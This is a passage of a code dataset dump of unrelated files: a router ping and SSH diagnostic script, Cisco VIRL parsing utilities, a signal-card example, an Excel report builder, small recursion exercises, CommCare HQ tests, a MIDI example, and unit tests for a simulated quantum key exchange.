pprint('\\nshow run int ' + newstr + '\\n\\n' + str(output), 'output')\n output_test = ssh(name, credent, 'show version | i up')\n test = output_test.split()\n get_name = test[0]\n if '-cs' not in get_name:\n file = open(\"pings.txt\", mode='r')\n array = file.read().splitlines()\n while number >=0:\n if stop == 0:\n if '-cs' in array[number]:\n router_num = number\n stop = 1\n number = number - 1\n\n outp = array[router_num]\n file.close()\n\n array1 = outp.split()\n cs_name = array1[7]\n\n\n last_reach1(host,cs_name, ipaddr, credent)\n else:\n last_reach1(host, name, ipaddr, credent)\n\n\n\ndef check_ping_LAN(host, credent):\n ######THIS METHOD IS FOR SWITCH (LAN) DOWN######\n res_print = run_shell(\"ping {}\".format(host))\n res1_print = run_shell(\"tracert -w 600 {}\".format(host))\n print()\n pprint('Hold On... Gathering Information...\\n')\n response = os.system(\"ping {} >pings.txt\".format(host))\n response1 = os.system(\"tracert -h 20 {} >>pings.txt\".format(host))\n j = 0\n k = 0\n i = 0\n end = 0\n counting = 0\n file = open(\"pings.txt\", mode='r')\n array = file.read().splitlines()\n for x in array:\n\n if 'Destination host unreachable' in x or 'Request timed out' in x:\n j = 1\n if 'Ping statistics for' in x:\n ipadd = x\n if k == 0:\n if '* * * Request timed out.' in x:\n counting = counting + 1\n if counting == 3:\n num = i - 2\n num = num -1\n k = 1\n else:\n counting = 0\n i = i + 1\n\n if j == 1:\n output = ssh_nsa('ping -c 5 {}'.format(host))\n pprint('\\nPinging from NSA\\n\\n'+ str(output), 'output')\n output = ssh_nsa('traceroute -m 18 {}'.format(host))\n pprint('\\nTracing from NSA\\n\\n'+ str(output), 'output')\n if any(word in array[num] for word in telco):\n end = 1\n pprint('Check for WAN outage', 'debug')\n else:\n if '.slb.net' in array[num]:\n outp = array[num]\n else:\n end = 1\n file.close()\n if end == 0:\n array = outp.split()\n name1 = array[8]\n name = ''.join((ch if ch in '0123456789.' else '') for ch in name1)\n\n ipaddr = ipadd.split()[3]\n newipadd = ''.join((ch if ch in '0123456789.' else '') for ch in ipaddr)\n\n last_reach(host, name, newipadd, num, credent)\n\n\n pingstatus = \"Device is Unreachable!!!\"\n else:\n output = ssh_nsa('ping -c 5 {}'.format(host))\n pprint('\\n'+ str(output), 'output')\n output = ssh_nsa('traceroute -m 18 {}'.format(host))\n pprint('\\n'+ str(output), 'output')\n output = ssh(host, credent, 'show version | i up')\n pprint('\\nshow version | i up\\n\\n' + str(output), 'output')\n output = ssh(host, credent, 'show ip bgp summary')\n pprint('\\nshow ip bgp summary\\n\\n' + str(output), 'output')\n output = ssh(host, credent, 'show clock')\n pprint('\\nshow clock\\n\\n' + str(output), 'output')\n pingstatus = \"Device is Reachable!!!\"\n\n return pingstatus\n\n\n\ndef check_ping(host, credent):\n ######THIS METHOD IS FOR ROUTER (WAN) DOWN######\n res_print = run_shell(\"ping {}\".format(host))\n res1_print = run_shell(\"tracert -w 600 {}\".format(host))\n print()\n pprint('Hold On... Gathering Information...\\n')\n response = os.system(\"ping {} >pings.txt\".format(host))\n response1 = os.system(\"tracert -h 15 {} >>pings.txt\".format(host))\n file = open(\"pings.txt\", mode='r')\n array = file.read().splitlines()\n j = 0\n for x in array:\n\n if 'Destination host unreachable' in x or 'Request timed out' in x:\n j = 1\n\n file.close()\n if j == 0:\n output = ssh_nsa('ping -c 5 {}'.format(host))\n pprint('\\nPing from NSA\\n\\n'+ str(output), 'output')\n output = ssh_nsa('traceroute -m 18 {}'.format(host))\n pprint('\\nTrace from NSA\\n\\n'+ str(output), 'output')\n\n output = ssh(host, credent, 'show version | i up'.format(host))\n pprint('\\nshow version | i up\\n\\n' + str(output), 'output')\n output = ssh(host, credent, 'show ip bgp summary'.format(host))\n pprint('\\nshow ip bgp summary\\n\\n' + str(output), 'output')\n output = ssh(host, credent, 'show clock')\n pprint('\\nshow clock\\n\\n' + str(output), 'output')\n pingstatus = \"Device is Reachable!!!\"\n else:\n output = ssh_nsa('ping -c 5 {}'.format(host))\n pprint('\\n'+ str(output), 'output')\n output = ssh_nsa('traceroute -m 18 {}'.format(host))\n pprint('\\n'+ str(output), 'output')\n pingstatus = \"Device is Unreachable!!!\"\n\n return pingstatus\n@timeit\ndef main(args):\n if os.environ.get('scriptldap') is not None:\n pprint(\"using env set credentials {}\".format(os.environ.get('scriptldap')))\n username = os.environ.get('scriptldap')\n password = os.environ.get('scripttacacspass')\n else:\n username = input(\"Username: \")\n password = getpass.getpass(\"Password: \")\n for host in args.hostname:\n #driver = get_network_driver('ios')\n #pprint('connecting to {}..'.format(host))\n credent = [username, password]\n try:\n if debug:\n # name = 'om0030-core-sw1.mgmt.slb.net'\n # last_reach(host, name, '172.30.195.19', 20)\n pprint('Pinging and tracing {}... Please Wait...'.format(host))\n if 'cs.mgmt.slb.net' not in host:\n output = check_ping_LAN(host, credent)\n else:\n output = check_ping(host, credent)\n pprint(str(output), 'debug')\n\n\n\n except Exception as e:\n pprint(str(e), 'error')\n\nif __name__ == '__main__':\n try:\n init()\n parser = argparse.ArgumentParser(description=\"Script to be used by EMC Analyst handling 'DEVICE NOT RESPONDING' Tickets\")\n parser.add_argument(\"hostname\", nargs='+', help=\"Device hostname\")\n parser.add_argument(\"--debug\", help=\"Enable Debug, will show API call details\", action='store_true',\n default=False)\n args = parser.parse_args()\n debug = args.debug\n main(args)\n except KeyboardInterrupt:\n print(\"\\n\")\n pprint(\"user cancel (Ctrl+C) received, exiting..\", \"info\")\n except Exception as e:\n pprint(str(e), \"error\")\n print(\"\\n\\n\")\n","sub_path":"venv/DNR.py","file_name":"DNR.py","file_ext":"py","file_size_in_byte":11200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"359741010","text":"#\n# Python bindings for the Cisco VIRL 2 Network Simulation Platform\n#\n# This file is part of VIRL 2\n#\n# Copyright 2020 Cisco Systems Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport io\nimport logging\n\n\nclass TextFsmNotInstalled(Exception):\n pass\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass TextFsmTemplateHelper:\n def __init__(self):\n self._tokens = []\n self._lines = []\n\n def clear(self):\n self._tokens = []\n self._lines = []\n\n def add_token(self, name, pattern):\n # TODO: warn if not raw string\n entry = \"Value {} ({})\".format(name, pattern)\n self._tokens.append(entry)\n\n def add_numeric_token(self, name):\n # TODO: warn if not raw string\n entry = \"Value {} (\\\\d+)\".format(name)\n self._tokens.append(entry)\n\n def add_line(self, line):\n # TODO: warn if unescaped brackets in line\n self._lines.append(line)\n\n def render(self):\n result = \"\"\n for token in self._tokens:\n result += token + \"\\n\"\n\n result += \"\\n\"\n result += \"Start\\n\"\n for line in self._lines:\n result += fr\" ^{line} -> Record\"\n\n return result\n\n\ndef splice_interface_ip_into_config(config, remote, ip_address, netmask):\n search_string = \"description to {}\\n no ip address\".format(remote)\n replace_string = \"description to {}\\n ip address {} {}\".format(\n remote, ip_address, netmask\n )\n return config.replace(search_string, replace_string)\n\n\ndef parse_with_textfsm_template(template, cli_result):\n try:\n import textfsm\n except ImportError:\n logger.warning(\"TextFSM not installed\")\n raise TextFsmNotInstalled\n\n string_fh = io.StringIO(template)\n fsm = textfsm.TextFSM(string_fh)\n fsm_result = fsm.ParseText(cli_result)\n result = []\n for entry in fsm_result:\n data = {}\n for index, heading in enumerate(fsm.header):\n data[heading] = entry[index]\n result.append(data)\n\n return result\n\n\ndef parse_ping(result):\n import re\n\n match = re.search(r\"Success rate is (?P\\d+) percent\", result)\n success_rate = int(match.group(\"rate\"))\n return {\"success\": success_rate}\n\n\ndef parse_interfaces(get_offsets_for_keywords, parse_line, result):\n lines = result.splitlines()\n\n title = lines[0]\n body = lines[1:]\n offsets = get_offsets_for_keywords(title)\n keys = [\"Interface\", \"Status\", \"Protocol\"]\n\n result = {}\n\n for line in body:\n data = parse_line(line, keys, offsets)\n label = data[\"Interface\"]\n result[label] = {\"Status\": data[\"Status\"], \"Protocol\": data[\"Protocol\"]}\n\n return result\n\n\ndef parse_line(line, keys, offsets):\n result = {}\n for key in keys:\n start = offsets[key][\"start\"]\n end = offsets[key][\"end\"]\n value = line[start:end]\n # strip off whitespace as could be right padded if short entry relative to others in the column\n result[key] = value.rstrip()\n return result\n\n\ndef get_offsets_for_keywords(title):\n offsets = {}\n start_index_for_keyword = None\n keyword = None\n previous_keyword = None\n\n for index, element in enumerate(title):\n if element == \" \":\n if start_index_for_keyword is not None:\n offsets[keyword] = {}\n offsets[keyword][\"start\"] = start_index_for_keyword\n\n if previous_keyword:\n offsets[previous_keyword][\"end\"] = start_index_for_keyword - 1\n\n start_index_for_keyword = None\n previous_keyword = keyword\n keyword = \"\"\n else:\n if start_index_for_keyword is None:\n start_index_for_keyword = index\n keyword = element\n else:\n keyword += element\n # and store final item (as don't transition char->whitespace)\n if start_index_for_keyword:\n offsets[keyword] = {}\n offsets[previous_keyword][\"end\"] = start_index_for_keyword - 1\n offsets[keyword][\"start\"] = start_index_for_keyword\n offsets[keyword][\"end\"] = index\n return offsets\n","sub_path":"virl2_client/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"21685633","text":"\n\n\n # EXAMPLE PROGRAM FROM SPECTRUM #\n\n\n\n\n# **************************************************************************\n#\n# simple_rep_single.py (c) Spectrum GmbH , 11/2009\n#\n# **************************************************************************\n#\n# Example for all SpcMDrv based analog replay cards. \n# Shows a simple standard mode example using only the few necessary commands\n#\n# Information about the different products and their drivers can be found\n# online in the Knowledge Base:\n# https://www.spectrum-instrumentation.com/en/platform-driver-and-series-differences\n#\n# Feel free to use this source for own projects and modify it in any kind\n#\n# Documentation for the API as well as a detailed description of the hardware\n# can be found in the manual for each device which can be found on our website:\n# https://www.spectrum-instrumentation.com/en/downloads\n#\n# Further information can be found online in the Knowledge Base:\n# https://www.spectrum-instrumentation.com/en/knowledge-base-overview\n#\n# **************************************************************************\n#\n\n\nfrom pyspcm import *\nfrom spcm_tools import *\nimport sys\nfrom math import sin, pi\n\n#\n# **************************************************************************\n# main \n# **************************************************************************\n#\n\n# open card\n# uncomment the second line and replace the IP address to use remote\n# cards like in a generatorNETBOX\nhCard = spcm_hOpen (create_string_buffer (b'/dev/spcm0'))\n#hCard = spcm_hOpen (create_string_buffer (b'TCPIP::192.168.1.10::inst0::INSTR'))\nif hCard == None:\n sys.stdout.write(\"no card found...\\n\")\n exit ()\n\n\n# read type, function and sn and check for D/A card\nlCardType = int32 (0)\nspcm_dwGetParam_i32 (hCard, SPC_PCITYP, byref (lCardType))\nlSerialNumber = int32 (0)\nspcm_dwGetParam_i32 (hCard, SPC_PCISERIALNO, byref (lSerialNumber))\nlFncType = int32 (0)\nspcm_dwGetParam_i32 (hCard, SPC_FNCTYPE, byref (lFncType))\n\nsCardName = szTypeToName (lCardType.value)\nif lFncType.value == SPCM_TYPE_AO:\n sys.stdout.write(\"Found: {0} sn {1:05d}\\n\".format(sCardName,lSerialNumber.value))\nelse:\n sys.stdout.write(\"This is an example for D/A cards.\\nCard: {0} sn {1:05d} not supported by example\\n\".format(sCardName,lSerialNumber.value))\n exit ()\n\n\n# set samplerate to 1 MHz (M2i) or 50 MHz, no clock output\nif ((lCardType.value & TYP_SERIESMASK) == TYP_M4IEXPSERIES) or ((lCardType.value & TYP_SERIESMASK) == TYP_M4XEXPSERIES):\n spcm_dwSetParam_i64 (hCard, SPC_SAMPLERATE, int64(MEGA(50)))\nelse:\n spcm_dwSetParam_i64 (hCard, SPC_SAMPLERATE, MEGA(1))\nspcm_dwSetParam_i32 (hCard, SPC_CLOCKOUT, 0)\n\n# setup the mode\nqwChEnable = uint32 (2)\nllMemSamples = int64 (KILO_B(64))\nllLoops = int64 (0) # loop continuously\nspcm_dwSetParam_i32 (hCard, SPC_CARDMODE, SPC_REP_STD_CONTINUOUS)\nspcm_dwSetParam_i32 (hCard, SPC_CHENABLE, qwChEnable)\nspcm_dwSetParam_i64 (hCard, SPC_MEMSIZE, llMemSamples)\nspcm_dwSetParam_i64 (hCard, SPC_LOOPS, llLoops)\nspcm_dwSetParam_i64 (hCard, SPC_ENABLEOUT1, int64(1))\n\nlSetChannels = int32 (0)\nspcm_dwGetParam_i32 (hCard, SPC_CHCOUNT, byref (lSetChannels))\nlBytesPerSample = int32 (0)\nspcm_dwGetParam_i32 (hCard, SPC_MIINST_BYTESPERSAMPLE, byref (lBytesPerSample))\n\n# setup the trigger mode\n# (SW trigger, no output)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_ORMASK, SPC_TMASK_SOFTWARE)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_ANDMASK, 0)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_CH_ORMASK0, 0)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_CH_ORMASK1, 0)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_CH_ANDMASK0, 0)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_CH_ANDMASK1, 0)\nspcm_dwSetParam_i32 (hCard, SPC_TRIGGEROUT, 0)\n\nlChannel = int32 (1)\nspcm_dwSetParam_i32 (hCard, SPC_AMP0 + lChannel.value * (SPC_AMP1 - SPC_AMP0), int32 (1000))\n\n# setup software buffer\nqwBufferSize = uint64 (llMemSamples.value * lBytesPerSample.value * lSetChannels.value)\npvBuffer = pvAllocMemPageAligned (qwBufferSize.value)\n\n# calculate the data\npnBuffer = cast (pvBuffer, ptr16)\nfor i in range (0, llMemSamples.value, 1):\n pnBuffer[i] = int(16384*sin(2*pi*(i / llMemSamples.value)))\n\n\n# we define the buffer for transfer and start the DMA transfer\nsys.stdout.write(\"Starting the DMA transfer and waiting until data is in board memory\\n\")\nspcm_dwDefTransfer_i64 (hCard, SPCM_BUF_DATA, SPCM_DIR_PCTOCARD, int32 (0), pvBuffer, uint64 (0), qwBufferSize)\nspcm_dwSetParam_i32 (hCard, SPC_M2CMD, M2CMD_DATA_STARTDMA | M2CMD_DATA_WAITDMA)\nsys.stdout.write(\"... data has been transferred to board memory\\n\")\n\n# We'll start and wait until the card has finished or until a timeout occurs\nspcm_dwSetParam_i32 (hCard, SPC_TIMEOUT, 10000)\nsys.stdout.write(\"\\nStarting the card and waiting for ready interrupt\\n(continuous and single restart will have timeout)\\n\")\ndwError = spcm_dwSetParam_i32 (hCard, SPC_M2CMD, M2CMD_CARD_START | M2CMD_CARD_ENABLETRIGGER | M2CMD_CARD_WAITREADY)\nif dwError == ERR_TIMEOUT:\n spcm_dwSetParam_i32 (hCard, SPC_M2CMD, M2CMD_CARD_STOP)\n\nspcm_vClose (hCard);\n\n","sub_path":"lib/simple_rep_single.py","file_name":"simple_rep_single.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"102114408","text":"#encoding:utf-8\n\n__author__ = 'e-com2'\n\n\nfrom openpyxl import load_workbook\nfrom openpyxl.drawing import Image\nimport PIL.Image\nimport Image as PILImage\nfrom openpyxl.styles.numbers import NumberFormat\nfrom openpyxl.styles import Style,Font,Color,Alignment,Border,Side\nfrom openpyxl.styles.alignment import HORIZONTAL_RIGHT, HORIZONTAL_LEFT\nfrom datetime import datetime\nimport openpyxl.worksheet.worksheet\nimport openpyxl.cell.cell\nfrom pprint import pprint\n\nPILImage.open = PIL.Image.open\n\nside = Side(\n style= 'thin',\n color= Color()\n)\n\nborder = Border(\n left = side,\n top = side,\n right = side,\n bottom = side\n)\n\nnumberformat = NumberFormat(NumberFormat.FORMAT_NUMBER_COMMA_SEPARATED1)\n\n\nbordered = Style(\n border = border\n)\n\nsumstyle = Style(\n # font = Font(color = Color(rgb=RED)),\n number_format=numberformat\n)\n\nborderedsum = Style(\n border = border,\n number_format=numberformat\n)\n\natleast = Style(\n number_format=NumberFormat('Не менее '+NumberFormat.FORMAT_NUMBER_COMMA_SEPARATED1)\n)\n\nwraptext = Style(\n alignment = Alignment(wrap_text=True),\n font = Font(name='Arial')\n)\nalignRight = Style(\n alignment = Alignment(horizontal=HORIZONTAL_RIGHT)\n)\n\ndateformat = Style(\n font = Font(bold=True),\n alignment = Alignment(horizontal=HORIZONTAL_LEFT),\n number_format = NumberFormat(NumberFormat.FORMAT_DATE_XLSX22)\n)\n\nwb = load_workbook('/image/basketx.xlsx')\ndel wb.worksheets[0] # Заявка\n# del wb.worksheets[1] # Заказ\n# ws = openpyxl.worksheet.worksheet.Worksheet()\n# ws.rows\n# ws.remove\n\n# print len(wb.worksheets)\n\nws = wb.worksheets[0]\n\nimg3 = Image('/image/logo.jpg')\n# afterwards one can still add additional offsets from the cell\nimg3.anchor(ws['H1'], anchortype='oneCell')\n\n# a = openpyxl.cell.cell.Cell()\n\nws['B3'] = datetime.now()\nws['B3'].style = dateformat\nws['B4'] = 'Договор № 0901/1СОВ от 10.01.2013'\nws['B5'] = 'ООО \"Рога и копыта\" - ООО \"Элевел Мастер\"'\n\nidx = 8\ni=0\nwhile i<3:\n ws['A%s'%idx]= 'Belden Кабель F/UTP 4р. cat 5е PVC экранированный'\n ws['B%s'%idx]= 'Belden 1633E'\n ws['C%s'%idx]= 12\n ws['D%s'%idx]= 'гт.'\n if i:\n ws['E%s'%idx]= '530 / 0'\n\n ws['F%s'%idx]= 100\n\n ws['G%s'%idx]= 28.15\n\n ws['H%s'%idx]= '=G8*C8'\n\n ws['I%s'%idx]= '1 день'\n\n else:\n ws['E%s'%idx]= 'позиция не из каталога - требует уточнения у менеджера'\n\n ws['A%s'%idx].style = bordered\n ws['B%s'%idx].style = bordered\n ws['C%s'%idx].style = bordered\n ws['D%s'%idx].style = bordered\n\n ws['E%s'%idx].style = bordered\n ws['F%s'%idx].style = bordered\n ws['G%s'%idx].style = borderedsum\n ws['H%s'%idx].style = borderedsum\n ws['I%s'%idx].style = bordered\n\n\n idx+=1\n i+=1\n\n\n\nidx+=1\n\n\nws['G%s'%idx] = 'Итого скидки (руб)'\nws['G%s'%idx].style = alignRight\nws['H%s'%idx] = 2342123.443\nws['H%s'%idx].style = sumstyle\n\nidx+=1\nws['G%s'%idx] = 'Итого сумма заказа (руб)'\nws['G%s'%idx].style = alignRight\nws['H%s'%idx] = 123321.222\nws['H%s'%idx].style = sumstyle\n\n\nidx+=2\nws['G%s'%idx] = 'Вес корзины (кг):'\nws['G%s'%idx].style = alignRight\nws['H%s'%idx] = \"не менее %s\"%str(round(18.238,2)).replace('.',',')\n\nidx+=1\nws['G%s'%idx] = 'Объем крзины (м3):'\nws['G%s'%idx].style = alignRight\nws['H%s'%idx] = \"не менее %s\"%str(round(3333,2)).replace('.',',')\n\nidx+=5\nws['A%s'%idx] = 'ВНИМАНИЕ: Такие показатели, как количество товара на складах, цены и прогнозный срок доставки являются актуальными в момент выгрузки заявки и могут измениться с течением времени'\nws['A%s'%idx].style = wraptext\nws.merge_cells('A%s:I%s'%(idx,idx+1))\n\nidx+=3\nws['A%s'%idx] = 'Данный файл готов для загрузки в корзину на портале e.way'\n\n# img3.drawing.left = 5\nimg3.drawing.top = 10\nws.add_image(img3)\n\n\nwb.save(\"/image/baskety.xlsx\")","sub_path":"xls.py","file_name":"xls.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"562738830","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. It cannot contain any loops.\n'''\ndef count_th(word):\n def keep_count(word, count):\n if len(word) <= 1:\n return count\n \n\n potential_t = word[0]\n potential_h = word[1]\n if potential_t + potential_h == \"th\":\n count += 1\n\n return keep_count(word[1:len(word)], count)\n\n return keep_count(word, 0)\n \n\n\nprint(\"should be 4,\", count_th(\"The fourth, thrid, and fifth\"))\n","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"101362311","text":"import asyncio\nimport logging\nimport math\n\nlogger = logging.getLogger('implementations')\n\n\nasync def recursive_fibonacci(number: int) -> int:\n \"\"\"\n Recursive classic calculation\n\n :param number:\n :return:\n \"\"\"\n if number <= 1:\n logger.info(f\"Recursive result is {number}\")\n return number\n\n return await recursive_fibonacci(number - 1) + \\\n await recursive_fibonacci(number - 2)\n\n\nasync def binet_fibonacci(number: int) -> int:\n \"\"\"\n Binet solution for fibonacci. No recursion\n\n :param number:\n :return:\n \"\"\"\n fibonacci = (\n (\n (1 + math.sqrt(5)) ** number - (1 - math.sqrt(5)) ** number\n )\n /\n ((2 ** number) * math.sqrt(5))\n )\n return int(fibonacci)\n\n\ndef fibonacci_with_generator(number: int):\n \"\"\"\n Calculate fibonacci using a generator\n :param number: int\n :return: int\n \"\"\"\n logger.info(f\"Fibonacci task starting for: {number}\")\n i = 0\n sequence = []\n while i < number:\n i += 1\n if len(sequence) < 2:\n sequence.append(1)\n yield sequence[-1]\n continue\n\n new_number = sum(sequence)\n sequence.append(new_number)\n sequence.pop(0)\n yield new_number\n","sub_path":"worker/application/implementations/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"304864372","text":"import datetime\nimport json\n\nfrom django.test import TestCase\n\nfrom corehq.apps.es.sms import SMSES\nfrom corehq.apps.es.tests.utils import es_test\nfrom corehq.apps.sms.models import INCOMING, OUTGOING\nfrom dimagi.utils.parsing import json_format_datetime\nfrom pillowtop.es_utils import initialize_index_and_mapping\n\nfrom corehq.apps.domain.calculations import all_domain_stats, calced_props, sms, get_sms_count\nfrom corehq.apps.domain.models import Domain\nfrom corehq.elastic import get_es_new, refresh_elasticsearch_index\nfrom corehq.pillows.mappings.case_mapping import CASE_INDEX_INFO\nfrom corehq.pillows.mappings.sms_mapping import SMS_INDEX_INFO\nfrom corehq.pillows.mappings.xform_mapping import XFORM_INDEX_INFO\nfrom corehq.pillows.mappings.user_mapping import USER_INDEX_INFO\nfrom corehq.util.elastic import ensure_index_deleted\nfrom corehq.elastic import send_to_elasticsearch\n\n\n@es_test\nclass BaseCalculatedPropertiesTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super(BaseCalculatedPropertiesTest, cls).setUpClass()\n cls.es = [{\n 'info': index_info,\n 'instance': get_es_new(),\n } for index_info in [CASE_INDEX_INFO, SMS_INDEX_INFO, XFORM_INDEX_INFO, USER_INDEX_INFO]]\n\n cls.domain = Domain(name='test-b9289e19d819')\n cls.domain.save()\n\n @classmethod\n def tearDownClass(cls):\n cls.domain.delete()\n for es in cls.es:\n ensure_index_deleted(es['info'].index)\n super(BaseCalculatedPropertiesTest, cls).tearDownClass()\n\n def setUp(self):\n for es in self.es:\n ensure_index_deleted(es['info'].index)\n initialize_index_and_mapping(es['instance'], es['info'])\n\n @staticmethod\n def create_sms_in_es(domain_name, direction):\n sms_doc = {\n '_id': 'some_sms_id',\n 'domain': domain_name,\n 'direction': direction,\n 'date': json_format_datetime(datetime.datetime.utcnow()),\n 'doc_type': SMS_INDEX_INFO.type,\n }\n send_to_elasticsearch(\"sms\", sms_doc)\n refresh_elasticsearch_index('sms')\n return sms_doc\n\n @staticmethod\n def delete_sms_in_es(sms_doc):\n send_to_elasticsearch(\"sms\", sms_doc, delete=True)\n refresh_elasticsearch_index('sms')\n\n\nclass DomainCalculatedPropertiesTest(BaseCalculatedPropertiesTest):\n\n def test_calculated_properties_are_serializable(self):\n sms_doc = self.create_sms_in_es(self.domain.name, INCOMING)\n self.addCleanup(self.delete_sms_in_es, sms_doc)\n all_stats = all_domain_stats()\n props = calced_props(self.domain, self.domain._id, all_stats)\n json.dumps(props)\n\n def test_domain_does_not_have_apps(self):\n sms_doc = self.create_sms_in_es(self.domain.name, INCOMING)\n self.addCleanup(self.delete_sms_in_es, sms_doc)\n all_stats = all_domain_stats()\n props = calced_props(self.domain, self.domain._id, all_stats)\n self.assertFalse(props['cp_has_app'])\n\n\nclass GetSMSCountTest(BaseCalculatedPropertiesTest):\n\n def test_sms_count(self):\n sms_doc = self.create_sms_in_es(self.domain.name, INCOMING)\n self.addCleanup(self.delete_sms_in_es, sms_doc)\n self.assertEqual(SMSES().count(), 1)\n self.assertEqual(sms(self.domain.name, INCOMING), 1)\n self.assertEqual(sms(self.domain.name, OUTGOING), 0)\n\n def test_days_as_str_is_valid(self):\n sms_doc = self.create_sms_in_es(self.domain.name, INCOMING)\n self.addCleanup(self.delete_sms_in_es, sms_doc)\n count = get_sms_count(self.domain.name, days='30')\n self.assertEqual(count, 1)\n","sub_path":"corehq/apps/domain/tests/test_domain_calculated_properties.py","file_name":"test_domain_calculated_properties.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"158607044","text":"# 1. Create the adjency matrix for the bags\n# 2. Work backwards to see which bags can fit our sophisticated bag\n\nimport numpy as np\n\nwith open('input') as datafile:\n data = datafile.read()\n data = data.strip().split('\\n')\n #data = [(bagtype, [(num, bagtype),...]), ...]\n data = [line.split(' bags contain ') for line in data]\n data = [(bagtype, [(int(c.split()[0]), ' '.join(c.split()[1:3])) for c in content.split(', ') if c[0] != 'n']) for (bagtype, content) in data]\n\nbagtypes = [entry[0] for entry in data]\n\n# 1.\nN = len(bagtypes)\nadjmat = np.zeros((N,N), dtype=int)\n\nfor row, entry in enumerate(data):\n for count, bag in entry[1]:\n col = bagtypes.index(bag)\n adjmat[row,col] = count\n\n# 2.\nptr = 0\nadjmat = adjmat.transpose()\ncompatible = list(np.where(adjmat[bagtypes.index('shiny gold')] != 0)[0])\n\nwhile ptr < len(compatible):\n bagnum = compatible[ptr]\n # print('Checking for', bagtypes[bagnum])\n for bag in np.where(adjmat[bagnum] != 0)[0]:\n # print(ptr, bagnum, bagtypes[bagnum], bagtypes[bag])\n if bag not in compatible:\n compatible.append(bag)\n ptr += 1\n\nprint(len(compatible))#, compatible)\n","sub_path":"Day 7: Handy Haversacks/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"157918456","text":"import rtmidi\n\n\nmidi_out = rtmidi.MidiOut()\nports = midi_out.get_ports()\n\nfor idx, port in enumerate(ports):\n print(f'{idx}: {port}')\nselected_port = input()\n\nmidi_out.open_port(int(selected_port))\n\n# Program change (patterns)\npattern = 0 # pattern 1\nbank = 0 # bank A\nmidi_out.send_message([0xC0, pattern + bank * 16])\n\n# Control Change (Continuous Controllers)\nmidi_out.send_message([0xB0, 82, 127]) # Channel 1, control 82, value 127\n","sub_path":"examples/ex3_control.py","file_name":"ex3_control.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"63189717","text":"#!/usr/bin/env python3\n# ---------------------------------------------------------------------------\n__author__ = \"HK Transfield\"\n# ---------------------------------------------------------------------------\n\"\"\"Unit tests for the Emulation module.\n\nThis test QKE.Emulation module, including the secure exchange of a \nsymmetrically encrypted message using the key produced by QKE.\n\nIt is then followed with tests for a confidentiality man-in-the-middle attack to test\nif it is possible to decpiher the exchanged secret message.\n\"\"\"\n# ---------------------------------------------------------------------------\n\nfrom random import randint\n\nfrom unittest import TestCase\nfrom QKE.Emulation import QKEEmulator\n\nqubit_lengths = [16, 256, 1048]\n\nemulate_standard = QKEEmulator(qubit_length=qubit_lengths[randint(0, 2)],\n message_length=randint(16, 4096))\n\nemulate_intercept = QKEEmulator(qubit_length=qubit_lengths[randint(0, 2)],\n message_length=randint(16, 4096),\n run_type=\"intercept\")\n\nemulate_mitm = QKEEmulator(qubit_length=qubit_lengths[randint(0, 2)],\n message_length=randint(16, 4096),\n run_type=\"attack\")\n\n\nclass TestQKE(TestCase):\n def test_QKE(self):\n \"\"\"Test 1\n \n This asserts that the keys generated by Alice and Bob are the same.\n \"\"\"\n\n do_keys_match = emulate_standard.run_QKE()\n self.assertTrue(do_keys_match)\n\n def test_symmetric_encryption(self):\n \"\"\"Test 2\n\n This test asserts that Alice and Bob can successfully perform symmetric \n encryption using the generated secret key. Alice should be able to encrypt \n a message using that key and send it to Bob, who can then decrypt it with \n the same key.\n \"\"\"\n\n do_messages_match = emulate_standard.run_symmetric_encryption()\n self.assertTrue(do_messages_match)\n\n def test_intercept_resend(self):\n \"\"\"Test 3\n \n This test asserts that when Eve intercepts the qubit stream and measures\n them using her own polarizations then it should result in Bob and Alice's\n keys no longer matching.\n \"\"\"\n\n intercept_results = emulate_intercept.run_QKE()\n self.assertFalse(intercept_results)\n\n def test_mitm_QKE(self):\n \"\"\"Test 4\n\n This test asserts that if Eve intercepts the qubit stream and measures\n them using Bob's polarizations it will result in the same keys as Bob\n and Alice\n \"\"\"\n mitm_QKE_results = emulate_mitm.run_QKE()\n self.assertTrue(mitm_QKE_results)\n\n def test_mitm_encryption(self):\n \"\"\"Test 5\n \n This test asserts that if Eve has the same key as Alice and Bob, she can\n then decipher the encrypted message sent using the key.\n \"\"\"\n mitm_encryption_results = 